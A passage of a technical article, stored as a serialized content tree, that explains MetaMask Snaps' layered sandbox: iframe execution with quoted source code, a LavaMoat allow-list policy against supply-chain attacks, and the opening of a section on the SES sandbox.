environment\n",{"type":27,"tag":207,"props":43433,"children":43434},{"class":209,"line":4103},[43435,43439,43443,43448,43453,43457,43462,43466,43470,43475,43479,43483],{"type":27,"tag":207,"props":43436,"children":43437},{"style":214},[43438],{"type":33,"value":2333},{"type":27,"tag":207,"props":43440,"children":43441},{"style":238},[43442],{"type":33,"value":16862},{"type":27,"tag":207,"props":43444,"children":43445},{"style":220},[43446],{"type":33,"value":43447},"jobId",{"type":27,"tag":207,"props":43449,"children":43450},{"style":238},[43451],{"type":33,"value":43452}," } ",{"type":27,"tag":207,"props":43454,"children":43455},{"style":226},[43456],{"type":33,"value":10380},{"type":27,"tag":207,"props":43458,"children":43459},{"style":376},[43460],{"type":33,"value":43461}," await",{"type":27,"tag":207,"props":43463,"children":43464},{"style":214},[43465],{"type":33,"value":42968},{"type":27,"tag":207,"props":43467,"children":43468},{"style":238},[43469],{"type":33,"value":1041},{"type":27,"tag":207,"props":43471,"children":43472},{"style":1335},[43473],{"type":33,"value":43474},"initJob",{"type":27,"tag":207,"props":43476,"children":43477},{"style":238},[43478],{"type":33,"value":1343},{"type":27,"tag":207,"props":43480,"children":43481},{"style":220},[43482],{"type":33,"value":43410},{"type":27,"tag":207,"props":43484,"children":43485},{"style":238},[43486],{"type":33,"value":1455},{"type":27,"tag":207,"props":43488,"children":43489},{"class":209,"line":4154},[43490,43494,43498,43503,43507,43512,43516,43520,43524,43528,43532,43537,43541,43545],{"type":27,"tag":207,"props":43491,"children":43492},{"style":214},[43493],{"type":33,"value":2333},{"type":27,"tag":207,"props":43495,"children":43496},{"style":238},[43497],{"type":33,"value":16862},{"type":27,"tag":207,"props":43499,"children":43500},{"style":220},[43501],{"type":33,"value":43502},"worker",{"type":27,"tag":207,"props":43504,"children":43505},{"style":238},[43506],{"type":33,"value":1123},{"type":27,"tag":207,"props":43508,"children":43509},{"style":220},[43510],{"type":33,"value":43511},"stream",{"type":27,"tag":207,"props":43513,"children":43514},{"style":238},[43515],{"type":33,"value":43452},{"type":27,"tag":207,"props":43517,"children":43518},{"style":226},[43519],{"type":33,"value":10380},{"type":27,"tag":207,"props":43521,"children":43522},{"style":376},[43523],{"type":33,"value":43461},{"type":27,"tag":207,"props":43525,"children":43526},{"style":214},[43527],{"type":33,"value":42968},{"type":27,"tag":207,"props":43529,"children":43530},{"style":238},[43531],{"type":33,"value":1041},{"type":27,"tag":207,"props":43533,"children":43534},{"style":1335},[43535],{"type":33,"value":43536},"initEnvStream",{"type":27,"tag":207,"props":43538,"children":43539},{"style":238},[43540],{"type":33,"value":1343},{"type":27,"tag":207,"props":43542,"children":43543},{"style":220},[43544],{"type":33,"value":43447},{"type":27,"tag":207,"props":43546,"children":43547},{"style":238},[43548],{"type":33,"value":1455},{"type":27,"tag":207,"props":43550,"children":43551},{"class":209,"line":4203},[43552],{"type":27,"tag":207,"props":43553,"children":43554},{"style":4647},[43555],{"type":33,"value":43556}," // ...\n",{"type":27,"tag":207,"props":43558,"children":43559},{"class":209,"line":4249},[43560],{"type":27,"tag":207,"props":43561,"children":43562},{"style":238},[43563],{"type":33,"value":451},{"type":27,"tag":36,"props":43565,"children":43566},{},[43567,43568,43573,43575,43581],{"type":33,"value":23888},{"type":27,"tag":84,"props":43569,"children":43571},{"className":43570},[],[43572],{"type":33,"value":43145},{"type":33,"value":43574}," registers message handlers that facilitate communication between Metamask and snaps within the iFrame. The ",{"type":27,"tag":84,"props":43576,"children":43578},{"className":43577},[],[43579],{"type":33,"value":43580},"${controllerName}:executeSnap",{"type":33,"value":43582}," handler triggers the snap execution process.",{"type":27,"tag":26163,"props":43584,"children":43586},{"id":43585},"step-by-step-execution-from-initialization-to-iframe-creation",[43587,43589],{"type":33,"value":43588},"Step-by-Step Execution: From Initialization to iFrame ",{"type":27,"tag":47,"props":43590,"children":43593},{"href":43591,"rel":43592},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-controllers/src/services/iframe/IframeExecutionService.ts#L31",[51],[43594],{"type":33,"value":43595},"creation",{"type":27,"tag":101,"props":43597,"children":43599},{"className":43182,"code":43598,"language":43184,"meta":7,"style":7},"protected async initEnvStream(jobId: string): Promise\u003C{\n worker: Window;\n stream: BasePostMessageStream;\n }> {\n const iframeWindow = await createWindow(this.iframeUrl.toString(), jobId);\n\n const stream = new WindowPostMessageStream({\n name: 'parent',\n target: 'child',\n targetWindow: iframeWindow,\n targetOrigin: '*',\n });\n\n return { worker: iframeWindow, stream };\n }\n",[43600],{"type":27,"tag":84,"props":43601,"children":43602},{"__ignoreMap":7},[43603,43652,43673,43694,43702,43766,43773,43801,43818,43835,43852,43869,43876,43883,43907],{"type":27,"tag":207,"props":43604,"children":43605},{"class":209,"line":210},[43606,43611,43616,43621,43625,43629,43633,43637,43642,43647],{"type":27,"tag":207,"props":43607,"children":43608},{"style":220},[43609],{"type":33,"value":43610},"protected",{"type":27,"tag":207,"props":43612,"children":43613},{"style":220},[43614],{"type":33,"value":43615}," async",{"type":27,"tag":207,"props":43617,"children":43618},{"style":1335},[43619],{"type":33,"value":43620}," initEnvStream",{"type":27,"tag":207,"props":43622,"children":43623},{"style":238},[43624],{"type":33,"value":1343},{"type":27,"tag":207,"props":43626,"children":43627},{"style":220},[43628],{"type":33,"value":43447},{"type":27,"tag":207,"props":43630,"children":43631},{"style":238},[43632],{"type":33,"value":22606},{"type":27,"tag":207,"props":43634,"children":43635},{"style":220},[43636],{"type":33,"value":36928},{"type":27,"tag":207,"props":43638,"children":43639},{"style":238},[43640],{"type":33,"value":43641},"): ",{"type":27,"tag":207,"props":43643,"children":43644},{"style":8920},[43645],{"type":33,"value":43646},"Promise",{"type":27,"tag":207,"props":43648,"children":43649},{"style":238},[43650],{"type":33,"value":43651},"\u003C{\n",{"type":27,"tag":207,"props":43653,"children":43654},{"class":209,"line":244},[43655,43660,43664,43669],{"type":27,"tag":207,"props":43656,"children":43657},{"style":220},[43658],{"type":33,"value":43659}," worker",{"type":27,"tag":207,"props":43661,"children":43662},{"style":226},[43663],{"type":33,"value":736},{"type":27,"tag":207,"props":43665,"children":43666},{"style":8920},[43667],{"type":33,"value":43668}," Window",{"type":27,"tag":207,"props":43670,"children":43671},{"style":238},[43672],{"type":33,"value":241},{"type":27,"tag":207,"props":43674,"children":43675},{"class":209,"line":270},[43676,43681,43685,43690],{"type":27,"tag":207,"props":43677,"children":43678},{"style":220},[43679],{"type":33,"value":43680}," stream",{"type":27,"tag":207,"props":43682,"children":43683},{"style":226},[43684],{"type":33,"value":736},{"type":27,"tag":207,"props":43686,"children":43687},{"style":8920},[43688],{"type":33,"value":43689}," BasePostMessageStream",{"type":27,"tag":207,"props":43691,"children":43692},{"style":238},[43693],{"type":33,"value":241},{"type":27,"tag":207,"props":43695,"children":43696},{"class":209,"line":296},[43697],{"type":27,"tag":207,"props":43698,"children":43699},{"style":238},[43700],{"type":33,"value":43701}," }> {\n",{"type":27,"tag":207,"props":43703,"children":43704},{"class":209,"line":445},[43705,43710,43715,43719,43723,43728,43732,43736,43740,43745,43749,43754,43758,43762],{"type":27,"tag":207,"props":43706,"children":43707},{"style":238},[43708],{"type":33,"value":43709}," const ",{"type":27,"tag":207,"props":43711,"children":43712},{"style":220},[43713],{"type":33,"value":43714},"iframeWindow",{"type":27,"tag":207,"props":43716,"children":43717},{"style":226},[43718],{"type":33,"value":229},{"type":27,"tag":207,"props":43720,"children":43721},{"style":376},[43722],{"type":33,"value":43461},{"type":27,"tag":207,"props":43724,"children":43725},{"style":1335},[43726],{"type":33,"value":43727}," createWindow",{"type":27,"tag":207,"props":43729,"children":43730},{"style":238},[43731],{"type":33,"value":1343},{"type":27,"tag":207,"props":43733,"children":43734},{"style":214},[43735],{"type":33,"value":24964},{"type":27,"tag":207,"props":43737,"children":43738},{"style":238},[43739],{"type":33,"value":1041},{"type":27,"tag":207,"props":43741,"children":43742},{"style":220},[43743],{"type":33,"value":43744},"iframeUrl",{"type":27,"tag":207,"props":43746,"children":43747},{"style":238},[43748],{"type":33,"value":1041},{"type":27,"tag":207,"props":43750,"children":43751},{"style":1335},[43752],{"type":33,"value":43753},"toString",{"type":27,"tag":207,"props":43755,"children":43756},{"style":238},[43757],{"type":33,"value":25646},{"type":27,"tag":207,"props":43759,"children":43760},{"style":220},[43761],{"type":33,"value":43447},{"type":27,"tag":207,"props":43763,"children":43764},{"style":238},[43765],{"type":33,"value":1455},{"type":27,"tag":207,"props":43767,"children":43768},{"class":209,"line":867},[43769],{"type":27,"tag":207,"props":43770,"children":43771},{"emptyLinePlaceholder":19},[43772],{"type":33,"value":2062},{"type":27,"tag":207,"props":43774,"children":43775},{"class":209,"line":892},[43776,43780,43784,43788,43792,43797],{"type":27,"tag":207,"props":43777,"children":43778},{"style":238},[43779],{"type":33,"value":43709},{"type":27,"tag":207,"props":43781,"children":43782},{"style":220},[43783],{"type":33,"value":43511},{"type":27,"tag":207,"props":43785,"children":43786},{"style":226},[43787],{"type":33,"value":229},{"type":27,"tag":207,"props":43789,"children":43790},{"style":214},[43791],{"type":33,"value":1597},{"type":27,"tag":207,"props":43793,"children":43794},{"style":1335},[43795],{"type":33,"value":43796}," WindowPostMessageStream",{"type":27,"tag":207,"props":43798,"children":43799},{"style":238},[43800],{"type":33,"value":22415},{"type":27,"tag":207,"props":43802,"children":43803},{"class":209,"line":1475},[43804,43809,43814],{"type":27,"tag":207,"props":43805,"children":43806},{"style":220},[43807],{"type":33,"value":43808}," name:",{"type":27,"tag":207,"props":43810,"children":43811},{"style":1325},[43812],{"type":33,"value":43813}," 'parent'",{"type":27,"tag":207,"props":43815,"children":43816},{"style":238},[43817],{"type":33,"value":1842},{"type":27,"tag":207,"props":43819,"children":43820},{"class":209,"line":2065},[43821,43826,43831],{"type":27,"tag":207,"props":43822,"children":43823},{"style":220},[43824],{"type":33,"value":43825}," target:",{"type":27,"tag":207,"props":43827,"children":43828},{"style":1325},[43829],{"type":33,"value":43830}," 'child'",{"type":27,"tag":207,"props":43832,"children":43833},{"style":238},[43834],{"type":33,"value":1842},{"type":27,"tag":207,"props":43836,"children":43837},{"class":209,"line":2092},[43838,43843,43848],{"type":27,"tag":207,"props":43839,"children":43840},{"style":220},[43841],{"type":33,"value":43842}," targetWindow:",{"type":27,"tag":207,"props":43844,"children":43845},{"style":220},[43846],{"type":33,"value":43847}," iframeWindow",{"type":27,"tag":207,"props":43849,"children":43850},{"style":238},[43851],{"type":33,"value":1842},{"type":27,"tag":207,"props":43853,"children":43854},{"class":209,"line":2130},[43855,43860,43865],{"type":27,"tag":207,"props":43856,"children":43857},{"style":220},[43858],{"type":33,"value":43859}," targetOrigin:",{"type":27,"tag":207,"props":43861,"children":43862},{"style":1325},[43863],{"type":33,"value":43864}," '*'",{"type":27,"tag":207,"props":43866,"children":43867},{"style":238},[43868],{"type":33,"value":1842},{"type":27,"tag":207,"props":43870,"children":43871},{"class":209,"line":2168},[43872],{"type":27,"tag":207,"props":43873,"children":43874},{"style":238},[43875],{"type":33,"value":39516},{"type":27,"tag":207,"props":43877,"children":43878},{"class":209,"line":4095},[43879],{"type":27,"tag":207,"props":43880,"children":43881},{"emptyLinePlaceholder":19},[43882],{"type":33,"value":2062},{"type":27,"tag":207,"props":43884,"children":43885},{"class":209,"line":4103},[43886,43891,43895,43899,43903],{"type":27,"tag":207,"props":43887,"children":43888},{"style":238},[43889],{"type":33,"value":43890}," return { worker: ",{"type":27,"tag":207,"props":43892,"children":43893},{"style":220},[43894],{"type":33,"value":43714},{"type":27,"tag":207,"props":43896,"children":43897},{"style":238},[43898],{"type":33,"value":1123},{"type":27,"tag":207,"props":43900,"children":43901},{"style":220},[43902],{"type":33,"value":43511},{"type":27,"tag":207,"props":43904,"children":43905},{"style":238},[43906],{"type":33,"value":25570},{"type":27,"tag":207,"props":43908,"children":43909},{"class":209,"line":4154},[43910],{"type":27,"tag":207,"props":43911,"children":43912},{"style":238},[43913],{"type":33,"value":5312},{"type":27,"tag":36,"props":43915,"children":43916},{},[43917,43919,43925,43927,43934],{"type":33,"value":43918},"Here the iframe is created via ",{"type":27,"tag":84,"props":43920,"children":43922},{"className":43921},[],[43923],{"type":33,"value":43924},"createWindow",{"type":33,"value":43926},", which is defined in snaps-utils ",{"type":27,"tag":47,"props":43928,"children":43931},{"href":43929,"rel":43930},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-utils/src/iframe.ts#L17",[51],[43932],{"type":33,"value":43933},"package",{"type":33,"value":736},{"type":27,"tag":101,"props":43936,"children":43938},{"className":43182,"code":43937,"language":43184,"meta":7,"style":7},"const iframe = document.createElement('iframe');\n iframe.setAttribute('id', id);\n iframe.setAttribute('data-testid', 'snaps-iframe');\n\n if (sandbox) {\n iframe.setAttribute('sandbox', 'allow-scripts');\n }\n iframe.setAttribute('src', uri);\n document.body.appendChild(iframe);\n",[43939],{"type":27,"tag":84,"props":43940,"children":43941},{"__ignoreMap":7},[43942,43985,44023,44060,44067,44087,44125,44132,44169],{"type":27,"tag":207,"props":43943,"children":43944},{"class":209,"line":210},[43945,43949,43954,43958,43963,43967,43972,43976,43981],{"type":27,"tag":207,"props":43946,"children":43947},{"style":214},[43948],{"type":33,"value":16931},{"type":27,"tag":207,"props":43950,"children":43951},{"style":220},[43952],{"type":33,"value":43953}," iframe",{"type":27,"tag":207,"props":43955,"children":43956},{"style":226},[43957],{"type":33,"value":229},{"type":27,"tag":207,"props":43959,"children":43960},{"style":220},[43961],{"type":33,"value":43962}," document",{"type":27,"tag":207,"props":43964,"children":43965},{"style":238},[43966],{"type":33,"value":1041},{"type":27,"tag":207,"props":43968,"children":43969},{"style":1335},[43970],{"type":33,"value":43971},"createElement",{"type":27,"tag":207,"props":43973,"children":43974},{"style":238},[43975],{"type":33,"value":1343},{"type":27,"tag":207,"props":43977,"children":43978},{"style":1325},[43979],{"type":33,"value":43980},"'iframe'",{"type":27,"tag":207,"props":43982,"children":43983},{"style":238},[43984],{"type":33,"value":1455},{"type":27,"tag":207,"props":43986,"children":43987},{"class":209,"line":244},[43988,43993,43997,44002,44006,44011,44015,44019],{"type":27,"tag":207,"props":43989,"children":43990},{"style":220},[43991],{"type":33,"value":43992}," iframe",{"type":27,"tag":207,"props":43994,"children":43995},{"style":238},[43996],{"type":33,"value":1041},{"type":27,"tag":207,"props":43998,"children":43999},{"style":1335},[44000],{"type":33,"value":44001},"setAttribute",{"type":27,"tag":207,"props":44003,"children":44004},{"style":238},[44005],{"type":33,"value":1343},{"type":27,"tag":207,"props":44007,"children":44008},{"style":1325},[44009],{"type":33,"value":44010},"'id'",{"type":27,"tag":207,"props":44012,"children":44013},{"style":238},[44014],{"type":33,"value":1123},{"type":27,"tag":207,"props":44016,"children":44017},{"style":220},[44018],{"type":33,"value":10773},{"type":27,"tag":207,"props":44020,"children":44021},{"style":238},[44022],{"type":33,"value":1455},{"type":27,"tag":207,"props":44024,"children":44025},{"class":209,"line":270},[44026,44030,44034,44038,44042,44047,44051,44056],{"type":27,"tag":207,"props":44027,"children":44028},{"style":220},[44029],{"type":33,"value":43992},{"type":27,"tag":207,"props":44031,"children":44032},{"style":238},[44033],{"type":33,"value":1041},{"type":27,"tag":207,"props":44035,"children":44036},{"style":1335},[44037],{"type":33,"value":44001},{"type":27,"tag":207,"props":44039,"children":44040},{"style":238},[44041],{"type":33,"value":1343},{"type":27,"tag":207,"props":44043,"children":44044},{"style":1325},[44045],{"type":33,"value":44046},"'data-testid'",{"type":27,"tag":207,"props":44048,"children":44049},{"style":238},[44050],{"type":33,"value":1123},{"type":27,"tag":207,"props":44052,"children":44053},{"style":1325},[44054],{"type":33,"value":44055},"'snaps-iframe'",{"type":27,"tag":207,"props":44057,"children":44058},{"style":238},[44059],{"type":33,"value":1455},{"type":27,"tag":207,"props":44061,"children":44062},{"class":209,"line":296},[44063],{"type":27,"tag":207,"props":44064,"children":44065},{"emptyLinePlaceholder":19},[44066],{"type":33,"value":2062},{"type":27,"tag":207,"props":44068,"children":44069},{"class":209,"line":445},[44070,44074,44078,44083],{"type":27,"tag":207,"props":44071,"children":44072},{"style":376},[44073],{"type":33,"value":19556},{"type":27,"tag":207,"props":44075,"children":44076},{"style":238},[44077],{"type":33,"value":686},{"type":27,"tag":207,"props":44079,"children":44080},{"style":220},[44081],{"type":33,"value":44082},"sandbox",{"type":27,"tag":207,"props":44084,"children":44085},{"style":238},[44086],{"type":33,"value":1424},{"type":27,"tag":207,"props":44088,"children":44089},{"class":209,"line":867},[44090,44095,44099,44103,44107,44112,44116,44121],{"type":27,"tag":207,"props":44091,"children":44092},{"style":220},[44093],{"type":33,"value":44094}," iframe",{"type":27,"tag":207,"props":44096,"children":44097},{"style":238},[44098],{"type":33,"value":1041},{"type":27,"tag":207,"props":44100,"children":44101},{"style":1335},[44102],{"type":33,"value":44001},{"type":27,"tag":207,"props":44104,"children":44105},{"style":238},[44106],{"type":33,"value":1343},{"type":27,"tag":207,"props":44108,"children":44109},{"style":1325},[44110],{"type":33,"value":44111},"'sandbox'",{"type":27,"tag":207,"props":44113,"children":44114},{"style":238},[44115],{"type":33,"value":1123},{"type":27,"tag":207,"props":44117,"children":44118},{"style":1325},[44119],{"type":33,"value":44120},"'allow-scripts'",{"type":27,"tag":207,"props":44122,"children":44123},{"style":238},[44124],{"type":33,"value":1455},{"type":27,"tag":207,"props":44126,"children":44127},{"class":209,"line":892},[44128],{"type":27,"tag":207,"props":44129,"children":44130},{"style":238},[44131],{"type":33,"value":10645},{"type":27,"tag":207,"props":44133,"children":44134},{"class":209,"line":1475},[44135,44139,44143,44147,44151,44156,44160,44165],{"type":27,"tag":207,"props":44136,"children":44137},{"style":220},[44138],{"type":33,"value":43992},{"type":27,"tag":207,"props":44140,"children":44141},{"style":238},[44142],{"type":33,"value":1041},{"type":27,"tag":207,"props":44144,"children":44145},{"style":1335},[44146],{"type":33,"value":44001},{"type":27,"tag":207,"props":44148,"children":44149},{"style":238},[44150],{"type":33,"value":1343},{"type":27,"tag":207,"props":44152,"children":44153},{"style":1325},[44154],{"type":33,"value":44155},"'src'",{"type":27,"tag":207,"props":44157,"children":44158},{"style":238},[44159],{"type":33,"value":1123},{"type":27,"tag":207,"props":44161,"children":44162},{"style":220},[44163],{"type":33,"value":44164},"uri",{"type":27,"tag":207,"props":44166,"children":44167},{"style":238},[44168],{"type":33,"value":1455},{"type":27,"tag":207,"props":44170,"children":44171},{"class":209,"line":2065},[44172,44176,44180,44184,44188,44193,44197,44202],{"type":27,"tag":207,"props":44173,"children":44174},{"style":220},[44175],{"type":33,"value":41929},{"type":27,"tag":207,"props":44177,"children":44178},{"style":238},[44179],{"type":33,"value":1041},{"type":27,"tag":207,"props":44181,"children":44182},{"style":220},[44183],{"type":33,"value":39657},{"type":27,"tag":207,"props":44185,"children":44186},{"style":238},[44187],{"type":33,"value":1041},{"type":27,"tag":207,"props":44189,"children":44190},{"style":1335},[44191],{"type":33,"value":44192},"appendChild",{"type":27,"tag":207,"props":44194,"children":44195},{"style":238},[44196],{"type":33,"value":1343},{"type":27,"tag":207,"props":44198,"children":44199},{"style":220},[44200],{"type":33,"value":44201},"iframe",{"type":27,"tag":207,"props":44203,"children":44204},{"style":238},[44205],{"type":33,"value":1455},{"type":27,"tag":36,"props":44207,"children":44208},{},[44209],{"type":33,"value":44210},"This enables the iframe to be created with sandbox attributes, ensuring secure execution.",{"type":27,"tag":58,"props":44212,"children":44214},{"id":44213},"lavamoat-against-supply-chain-attacks-layer-2",[44215],{"type":33,"value":44216},"LavaMoat against Supply Chain Attacks - Layer 2",{"type":27,"tag":36,"props":44218,"children":44219},{},[44220],{"type":33,"value":44221},"Instances of software supply chain breaches occur when a malicious component infiltrates a developer's application. Subsequently, attackers exploit the component to extract critical information, such as private access keys. To safeguard against these issues, Metamask employs a tool called LavaMoat.",{"type":27,"tag":36,"props":44223,"children":44224},{},[44225,44227,44233],{"type":33,"value":44226},"Malicious dependencies might utilize built-in modules like ",{"type":27,"tag":84,"props":44228,"children":44230},{"className":44229},[],[44231],{"type":33,"value":44232},"fs",{"type":33,"value":44234},". Alternatively, they may inject malicious code into the npm package to target global objects, like the window and document. They might also include code that leverages XMLHttpRequest to make unauthorized requests to external servers, enabling the exfiltration of sensitive user information.",{"type":27,"tag":36,"props":44236,"children":44237},{},[44238],{"type":33,"value":44239},"In order to prevent this, Metamask Snaps use a Policy file provided by LavaMoat, that grants the platform API and the Globals access just to the essentials components. This limits the access to fields of powerful objects to corrupted dependencies.",{"type":27,"tag":36,"props":44241,"children":44242},{},[44243,44245,44252],{"type":33,"value":44244},"This is how a Policy file related to the iframes ",{"type":27,"tag":47,"props":44246,"children":44249},{"href":44247,"rel":44248},"https://github.com/MetaMask/snaps/blob/c5ddd897734f900f459c66a91f3334e76903825c/packages/snaps-execution-environments/lavamoat/browserify/iframe/policy.json#L49",[51],[44250],{"type":33,"value":44251},"looks",{"type":33,"value":736},{"type":27,"tag":101,"props":44254,"children":44256},{"className":41251,"code":44255,"language":41253,"meta":7,"style":7},"\"@metamask/post-message-stream\": {\n \"globals\": {\n \"MessageEvent.prototype\": true,\n \"WorkerGlobalScope\": true,\n \"addEventListener\": true,\n \"browser\": true,\n \"chrome\": true,\n \"location.origin\": true,\n \"postMessage\": true,\n \"removeEventListener\": true\n },\n \"packages\": {\n \"@metamask/post-message-stream>@metamask/utils\": true,\n \"@metamask/post-message-stream>readable-stream\": true\n }\n }\n",[44257],{"type":27,"tag":84,"props":44258,"children":44259},{"__ignoreMap":7},[44260,44273,44285,44305,44325,44345,44365,44385,44405,44425,44442,44450,44462,44482,44498,44505],{"type":27,"tag":207,"props":44261,"children":44262},{"class":209,"line":210},[44263,44268],{"type":27,"tag":207,"props":44264,"children":44265},{"style":1325},[44266],{"type":33,"value":44267},"\"@metamask/post-message-stream\"",{"type":27,"tag":207,"props":44269,"children":44270},{"style":238},[44271],{"type":33,"value":44272},": {\n",{"type":27,"tag":207,"props":44274,"children":44275},{"class":209,"line":244},[44276,44281],{"type":27,"tag":207,"props":44277,"children":44278},{"style":220},[44279],{"type":33,"value":44280}," \"globals\"",{"type":27,"tag":207,"props":44282,"children":44283},{"style":238},[44284],{"type":33,"value":44272},{"type":27,"tag":207,"props":44286,"children":44287},{"class":209,"line":270},[44288,44293,44297,44301],{"type":27,"tag":207,"props":44289,"children":44290},{"style":220},[44291],{"type":33,"value":44292}," \"MessageEvent.prototype\"",{"type":27,"tag":207,"props":44294,"children":44295},{"style":238},[44296],{"type":33,"value":22606},{"type":27,"tag":207,"props":44298,"children":44299},{"style":214},[44300],{"type":33,"value":11278},{"type":27,"tag":207,"props":44302,"children":44303},{"style":238},[44304],{"type":33,"value":1842},{"type":27,"tag":207,"props":44306,"children":44307},{"class":209,"line":296},[44308,44313,44317,44321],{"type":27,"tag":207,"props":44309,"children":44310},{"style":220},[44311],{"type":33,"value":44312}," \"WorkerGlobalScope\"",{"type":27,"tag":207,"props":44314,"children":44315},{"style":238},[44316],{"type":33,"value":22606},{"type":27,"tag":207,"props":44318,"children":44319},{"style":214},[44320],{"type":33,"value":11278},{"type":27,"tag":207,"props":44322,"children":44323},{"style":238},[44324],{"type":33,"value":1842},{"type":27,"tag":207,"props":44326,"children":44327},{"class":209,"line":445},[44328,44333,44337,44341],{"type":27,"tag":207,"props":44329,"children":44330},{"style":220},[44331],{"type":33,"value":44332}," \"addEventListener\"",{"type":27,"tag":207,"props":44334,"children":44335},{"style":238},[44336],{"type":33,"value":22606},{"type":27,"tag":207,"props":44338,"children":44339},{"style":214},[44340],{"type":33,"value":11278},{"type":27,"tag":207,"props":44342,"children":44343},{"style":238},[44344],{"type":33,"value":1842},{"type":27,"tag":207,"props":44346,"children":44347},{"class":209,"line":867},[44348,44353,44357,44361],{"type":27,"tag":207,"props":44349,"children":44350},{"style":220},[44351],{"type":33,"value":44352}," \"browser\"",{"type":27,"tag":207,"props":44354,"children":44355},{"style":238},[44356],{"type":33,"value":22606},{"type":27,"tag":207,"props":44358,"children":44359},{"style":214},[44360],{"type":33,"value":11278},{"type":27,"tag":207,"props":44362,"children":44363},{"style":238},[44364],{"type":33,"value":1842},{"type":27,"tag":207,"props":44366,"children":44367},{"class":209,"line":892},[44368,44373,44377,44381],{"type":27,"tag":207,"props":44369,"children":44370},{"style":220},[44371],{"type":33,"value":44372}," \"chrome\"",{"type":27,"tag":207,"props":44374,"children":44375},{"style":238},[44376],{"type":33,"value":22606},{"type":27,"tag":207,"props":44378,"children":44379},{"style":214},[44380],{"type":33,"value":11278},{"type":27,"tag":207,"props":44382,"children":44383},{"style":238},[44384],{"type":33,"value":1842},{"type":27,"tag":207,"props":44386,"children":44387},{"class":209,"line":1475},[44388,44393,44397,44401],{"type":27,"tag":207,"props":44389,"children":44390},{"style":220},[44391],{"type":33,"value":44392}," \"location.origin\"",{"type":27,"tag":207,"props":44394,"children":44395},{"style":238},[44396],{"type":33,"value":22606},{"type":27,"tag":207,"props":44398,"children":44399},{"style":214},[44400],{"type":33,"value":11278},{"type":27,"tag":207,"props":44402,"children":44403},{"style":238},[44404],{"type":33,"value":1842},{"type":27,"tag":207,"props":44406,"children":44407},{"class":209,"line":2065},[44408,44413,44417,44421],{"type":27,"tag":207,"props":44409,"children":44410},{"style":220},[44411],{"type":33,"value":44412}," \"postMessage\"",{"type":27,"tag":207,"props":44414,"children":44415},{"style":238},[44416],{"type":33,"value":22606},{"type":27,"tag":207,"props":44418,"children":44419},{"style":214},[44420],{"type":33,"value":11278},{"type":27,"tag":207,"props":44422,"children":44423},{"style":238},[44424],{"type":33,"value":1842},{"type":27,"tag":207,"props":44426,"children":44427},{"class":209,"line":2092},[44428,44433,44437],{"type":27,"tag":207,"props":44429,"children":44430},{"style":220},[44431],{"type":33,"value":44432}," \"removeEventListener\"",{"type":27,"tag":207,"props":44434,"children":44435},{"style":238},[44436],{"type":33,"value":22606},{"type":27,"tag":207,"props":44438,"children":44439},{"style":214},[44440],{"type":33,"value":44441},"true\n",{"type":27,"tag":207,"props":44443,"children":44444},{"class":209,"line":2130},[44445],{"type":27,"tag":207,"props":44446,"children":44447},{"style":238},[44448],{"type":33,"value":44449}," },\n",{"type":27,"tag":207,"props":44451,"children":44452},{"class":209,"line":2168},[44453,44458],{"type":27,"tag":207,"props":44454,"children":44455},{"style":220},[44456],{"type":33,"value":44457}," \"packages\"",{"type":27,"tag":207,"props":44459,"children":44460},{"style":238},[44461],{"type":33,"value":44272},{"type":27,"tag":207,"props":44463,"children":44464},{"class":209,"line":4095},[44465,44470,44474,44478],{"type":27,"tag":207,"props":44466,"children":44467},{"style":220},[44468],{"type":33,"value":44469}," \"@metamask/post-message-stream>@metamask/utils\"",{"type":27,"tag":207,"props":44471,"children":44472},{"style":238},[44473],{"type":33,"value":22606},{"type":27,"tag":207,"props":44475,"children":44476},{"style":214},[44477],{"type":33,"value":11278},{"type":27,"tag":207,"props":44479,"children":44480},{"style":238},[44481],{"type":33,"value":1842},{"type":27,"tag":207,"props":44483,"children":44484},{"class":209,"line":4103},[44485,44490,44494],{"type":27,"tag":207,"props":44486,"children":44487},{"style":220},[44488],{"type":33,"value":44489}," \"@metamask/post-message-stream>readable-stream\"",{"type":27,"tag":207,"props":44491,"children":44492},{"style":238},[44493],{"type":33,"value":22606},{"type":27,"tag":207,"props":44495,"children":44496},{"style":214},[44497],{"type":33,"value":44441},{"type":27,"tag":207,"props":44499,"children":44500},{"class":209,"line":4154},[44501],{"type":27,"tag":207,"props":44502,"children":44503},{"style":238},[44504],{"type":33,"value":19941},{"type":27,"tag":207,"props":44506,"children":44507},{"class":209,"line":4203},[44508],{"type":27,"tag":207,"props":44509,"children":44510},{"style":238},[44511],{"type":33,"value":10645},{"type":27,"tag":36,"props":44513,"children":44514},{},[44515,44517,44523,44525,44531,44533,44539,44541,44547,44548,44554],{"type":33,"value":44516},"One crucial aspect of the policy, apart from the ",{"type":27,"tag":84,"props":44518,"children":44520},{"className":44519},[],[44521],{"type":33,"value":44522},"globals",{"type":33,"value":44524}," section, is the ",{"type":27,"tag":84,"props":44526,"children":44528},{"className":44527},[],[44529],{"type":33,"value":44530},"packages",{"type":33,"value":44532}," segment. This section permits the ",{"type":27,"tag":84,"props":44534,"children":44536},{"className":44535},[],[44537],{"type":33,"value":44538},"@metamask/post-message-stream",{"type":33,"value":44540},"package to exclusively interact with the package ",{"type":27,"tag":84,"props":44542,"children":44544},{"className":44543},[],[44545],{"type":33,"value":44546},"@metamask/utils",{"type":33,"value":1131},{"type":27,"tag":84,"props":44549,"children":44551},{"className":44550},[],[44552],{"type":33,"value":44553},"readable-stream",{"type":33,"value":44555},". It ensures that interactions with potentially compromised packages are disallowed.",{"type":27,"tag":36,"props":44557,"children":44558},{},[44559,44561,44567],{"type":33,"value":44560},"LavaMoat additionally provides protection against prototype pollution attacks, since a malicious extension could use it to tamper with a legitimate function with arbitrary code. To safeguard against this, LavaMoat uses SES ",{"type":27,"tag":84,"props":44562,"children":44564},{"className":44563},[],[44565],{"type":33,"value":44566},"lockdown",{"type":33,"value":44568}," function to freeze all javascript builtins prototypes.",{"type":27,"tag":58,"props":44570,"children":44572},{"id":44571},"secure-ecmascript-ses-sandbox-layer-3",[44573],{"type":33,"value":44574},"Secure EcmaScript (SES) sandbox - Layer 3",{"type":27,"tag":36,"props":44576,"children":44577},{},[44578,44580,44587],{"type":33,"value":44579},"Within the iframe and after the lavamoat execution, the metamask sandbox uses the ",{"type":27,"tag":47,"props":44581,"children":44584},{"href":44582,"rel":44583},"https://github.com/endojs/endo/tree/master/packages/ses",[51],[44585],{"type":33,"value":44586},"Secure EcmaScript (SES)",{"type":33,"value":44588}," as a way to setup limits to the snap. 